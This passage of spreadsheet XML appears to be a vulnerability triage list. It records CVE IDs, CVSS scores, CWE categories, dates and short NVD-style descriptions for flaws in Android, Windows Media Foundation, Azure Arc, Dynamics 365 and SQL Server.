          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G102" s="5" t="inlineStr"/>
      <c r="H102" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I102" s="5" t="inlineStr"/>
      <c r="J102" s="5" t="inlineStr"/>
      <c r="K102" s="5" t="inlineStr">
        <is>
          <t>google:android</t>
        </is>
      </c>
      <c r="L102" s="5" t="inlineStr"/>
      <c r="M102" s="5" t="inlineStr"/>
      <c r="N102" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O102" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P102" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q102" s="5" t="inlineStr"/>
      <c r="R102" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-787</t>
        </is>
      </c>
      <c r="S102" s="5" t="inlineStr">
        <is>
          <t>In dec_frm_prepare of oapv.c, there is a possible OOB write due to a heap buffer overflow. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="T102" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28618</t>
        </is>
      </c>
    </row>
    <row r="103">
      <c r="A103" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B103" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C103" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28666</t>
        </is>
      </c>
      <c r="D103" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E103" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F103" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G103" s="5" t="inlineStr"/>
      <c r="H103" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I103" s="5" t="inlineStr"/>
      <c r="J103" s="5" t="inlineStr"/>
      <c r="K103" s="5" t="inlineStr"/>
      <c r="L103" s="5" t="inlineStr"/>
      <c r="M103" s="5" t="inlineStr"/>
      <c r="N103" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O103" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P103" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q103" s="5" t="inlineStr"/>
      <c r="R103" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S103"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T103" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28666</t>
        </is>
      </c>
    </row>
    <row r="104">
      <c r="A104" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B104" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C104" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-30754</t>
        </is>
      </c>
      <c r="D104" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E104" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F104" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G104" s="5" t="inlineStr"/>
      <c r="H104" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I104" s="5" t="inlineStr"/>
      <c r="J104" s="5" t="inlineStr"/>
      <c r="K104" s="5" t="inlineStr"/>
      <c r="L104" s="5" t="inlineStr"/>
      <c r="M104" s="5" t="inlineStr"/>
      <c r="N104" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O104" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P104" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q104" s="5" t="inlineStr"/>
      <c r="R104" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S104" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="T104" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-30754</t>
        </is>
      </c>
    </row>
    <row r="105">
      <c r="A105" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B105" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C105" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49879</t>
        </is>
      </c>
      <c r="D105" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E105" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F105" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G105" s="5" t="inlineStr"/>
      <c r="H105" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I105" s="5" t="inlineStr"/>
      <c r="J105" s="5" t="inlineStr"/>
      <c r="K105" s="5" t="inlineStr"/>
      <c r="L105" s="5" t="inlineStr"/>
      <c r="M105" s="5" t="inlineStr"/>
      <c r="N105" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O105" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P105" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q105" s="5" t="inlineStr"/>
      <c r="R105" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S105" s="5" t="inlineStr">
        <is>
          <t>In multiple functions of rw_t3t.cc, there is a possible out of bounds write due to an integer overflow. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="T105" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49879</t>
        </is>
      </c>
    </row>
    <row r="106">
      <c r="A106" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B106" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C106" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49882</t>
        </is>
      </c>
      <c r="D106" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E106" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F106" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G106" s="5" t="inlineStr"/>
      <c r="H106" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I106" s="5" t="inlineStr"/>
      <c r="J106" s="5" t="inlineStr"/>
      <c r="K106" s="5" t="inlineStr"/>
      <c r="L106" s="5" t="inlineStr"/>
      <c r="M106" s="5" t="inlineStr"/>
      <c r="N106" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O106" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P106" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q106" s="5" t="inlineStr"/>
      <c r="R106" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S106" s="5" t="inlineStr">
        <is>
          <t>In rw_mfc_handle_read_op of rw_mfc.cc, there is a possible memory safety issue due to a heap buffer overflow. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="T106" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49882</t>
        </is>
      </c>
    </row>
    <row r="107">
      <c r="A107" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B107" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C107" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62706</t>
        </is>
      </c>
      <c r="D107" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E107" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F107" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G107" s="5" t="inlineStr"/>
      <c r="H107" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I107" s="5" t="inlineStr"/>
      <c r="J107" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1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7" s="5" t="inlineStr"/>
      <c r="M107" s="5" t="inlineStr"/>
      <c r="N107" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O107" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P107" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q107" s="5" t="inlineStr"/>
      <c r="R107" s="5" t="inlineStr">
        <is>
          <t>CWE-121, CWE-125</t>
        </is>
      </c>
      <c r="S107" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Microsoft Windows Media Foundation allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T107" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62706</t>
        </is>
      </c>
    </row>
    <row r="108">
      <c r="A108" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B108" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C108" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62744</t>
        </is>
      </c>
      <c r="D108" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E108" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F108" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G108" s="5" t="inlineStr"/>
      <c r="H108" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I108" s="5" t="inlineStr"/>
      <c r="J108" s="5" t="inlineStr"/>
      <c r="K108" s="5" t="inlineStr"/>
      <c r="L108" s="5" t="inlineStr"/>
      <c r="M108" s="5" t="inlineStr"/>
      <c r="N108" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O108" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P108" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q108" s="5" t="inlineStr"/>
      <c r="R108" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S108" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Windows Media Foundation allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T108" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62744</t>
        </is>
      </c>
    </row>
    <row r="109">
      <c r="A109" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B109" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C109" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62895</t>
        </is>
      </c>
      <c r="D109" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E109" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F109" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G109" s="5" t="inlineStr"/>
      <c r="H109" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I109" s="5" t="inlineStr"/>
      <c r="J109" s="5" t="inlineStr"/>
      <c r="K109" s="5" t="inlineStr"/>
      <c r="L109" s="5" t="inlineStr"/>
      <c r="M109" s="5" t="inlineStr"/>
      <c r="N109" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O109" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P109" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q109" s="5" t="inlineStr"/>
      <c r="R109" s="5" t="inlineStr">
        <is>
          <t>CWE-1390, CWE-89, CWE-942</t>
        </is>
      </c>
      <c r="S109" s="5" t="inlineStr">
        <is>
          <t>Permissive cross-domain policy with untrusted domains in Azure Arc allows an unauthorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T109" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62895</t>
        </is>
      </c>
    </row>
    <row r="110">
      <c r="A110" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B110" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C110" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-65772</t>
        </is>
      </c>
      <c r="D110" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E110" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F110" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G110" s="5" t="inlineStr"/>
      <c r="H110" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I110" s="5" t="inlineStr"/>
      <c r="J110" s="5" t="inlineStr"/>
      <c r="K110" s="5" t="inlineStr"/>
      <c r="L110" s="5" t="inlineStr"/>
      <c r="M110" s="5" t="inlineStr"/>
      <c r="N110" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O110" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P110" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q110" s="5" t="inlineStr"/>
      <c r="R110" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="S110" s="5" t="inlineStr">
        <is>
          <t>Deserialization of untrusted data in Microsoft Dynamics 365 allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T110" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-65772</t>
        </is>
      </c>
    </row>
    <row r="111">
      <c r="A111" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B111" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C111" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66814</t>
        </is>
      </c>
      <c r="D111" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E111" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F111" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G111" s="5" t="inlineStr"/>
      <c r="H111" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I111" s="5" t="inlineStr"/>
      <c r="J111" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K111" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L111" s="5" t="inlineStr"/>
      <c r="M111" s="5" t="inlineStr"/>
      <c r="N111" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O111" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P111" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q111" s="5" t="inlineStr"/>
      <c r="R111" s="5" t="inlineStr">
        <is>
          <t>CWE-1220</t>
        </is>
      </c>
      <c r="S111" s="5" t="inlineStr">
        <is>
          <t>Insufficient granularity of access control in SQL Server allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T111" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66814</t>
        </is>
      </c>
    </row>
    <row r="112">
      <c r="A112" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B112" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C112" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66818</t>
        </is>
      </c>
      <c r="D112" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E112" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F112" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G112" s="5" t="inlineStr"/>
      <c r="H112" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I112" s="5" t="inlineStr"/>
      <c r="J112" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K112" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L112" s="5" t="inlineStr"/>
      <c r="M112" s="5" t="inlineStr"/>
      <c r="N112" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O112" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P112" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q112" s="5" t="inlineStr"/>
      <c r="R112" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="S112" s="5" t="inlineStr">
        <is>
          <t>Improper privilege management in SQL Server allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T112" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66818</t>
        </is>
      </c>
    </row>
    <row r="113">
      <c r="A113" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B113" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C113" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66819</t>
        </is>
      </c>
      <c r="D113" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E113" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F113" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G113" s="5" t="inlineStr"/>
      <c r="H113" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I113" s="5" t="inlineStr"/>
      <c r="J113" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K113" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L113" s="5" t="inlineStr"/>
      <c r="M113" s="5" t="inlineStr"/>
      <c r="N113" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O113" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P113" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q113" s="5" t="inlineStr"/>
      <c r="R113" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S113" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements used in an sql command ('sql injection') in SQL Server allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T113" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66819</t>
        </is>
      </c>
    </row>
    <row r="114">
      <c r="A114" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B114" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C114" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66820</t>
        </is>
      </c>
      <c r="D114" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E114" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F114" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G114" s="5" t="inlineStr"/>
      <c r="H114" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I114" s="5" t="inlineStr"/>
      <c r="J114" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K114" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L114" s="5" t="inlineStr"/>
      <c r="M114" s="5" t="inlineStr"/>
      <c r="N114" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O114" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P114" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q114" s="5" t="inlineStr"/>
      <c r="R114" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S114" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements used in an sql command ('sql injection') in SQL Server allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T114" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66820</t>
        </is>
      </c>
    </row>
    <row r="115">
      <c r="A115" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B115" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C115" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67368</t>
        </is>
      </c>
      <c r="D115" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E115" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F115" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G115" s="5" t="inlineStr"/>
      <c r="H115" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I115" s="5" t="inlineStr"/>
      <c r="J115" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K115" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L115" s="5" t="inlineStr"/>
      <c r="M115" s="5" t="inlineStr"/>
      <c r="N115" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O115" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P115" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q115" s="5" t="inlineStr"/>
      <c r="R115" s="5" t="inlineStr">
        <is>
          <t>CWE-59</t>
        </is>
      </c>
      <c r="S115" s="5" t="inlineStr">
        <is>
          <t>Improper link resolution before file access ('link following') in SQL Server allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T115" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67368</t>
        </is>
      </c>
    </row>
    <row r="116">
      <c r="A116" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B116" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C116" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67370</t>
        </is>
      </c>
      <c r="D116" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E116" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F116" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G116" s="5" t="inlineStr"/>
      <c r="H116" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I116" s="5" t="inlineStr"/>
      <c r="J116" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K116" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L116" s="5" t="inlineStr"/>
      <c r="M116" s="5" t="inlineStr"/>
      <c r="N116" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O116" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P116" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q116" s="5" t="inlineStr"/>
      <c r="R116" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S116" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements used in an sql command ('sql injection') in SQL Server allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T116" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67370</t>
        </is>
      </c>
    </row>
    <row r="117">
      <c r="A117" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B117" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C117" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67373</t>
        </is>
      </c>
      <c r="D117" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E117" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F117" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G117" s="5" t="inlineStr"/>
      <c r="H117" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I117" s="5" t="inlineStr"/>
      <c r="J117" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K117" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L117" s="5" t="inlineStr"/>
      <c r="M117" s="5" t="inlineStr"/>
      <c r="N117" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O117" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P117" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q117" s="5" t="inlineStr"/>
      <c r="R117" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S117" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T117" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67373</t>
        </is>
      </c>
    </row>
    <row r="118">
      <c r="A118" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B118" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C118" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67380</t>
        </is>
      </c>
      <c r="D118" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E118" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F118" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G118" s="5" t="inlineStr"/>
      <c r="H118" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I118" s="5" t="inlineStr"/>
      <c r="J118" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K118" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L118" s="5" t="inlineStr"/>
      <c r="M118" s="5" t="inlineStr"/>
      <c r="N118" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O118" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P118" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q118" s="5" t="inlineStr"/>
      <c r="R118" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S118" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
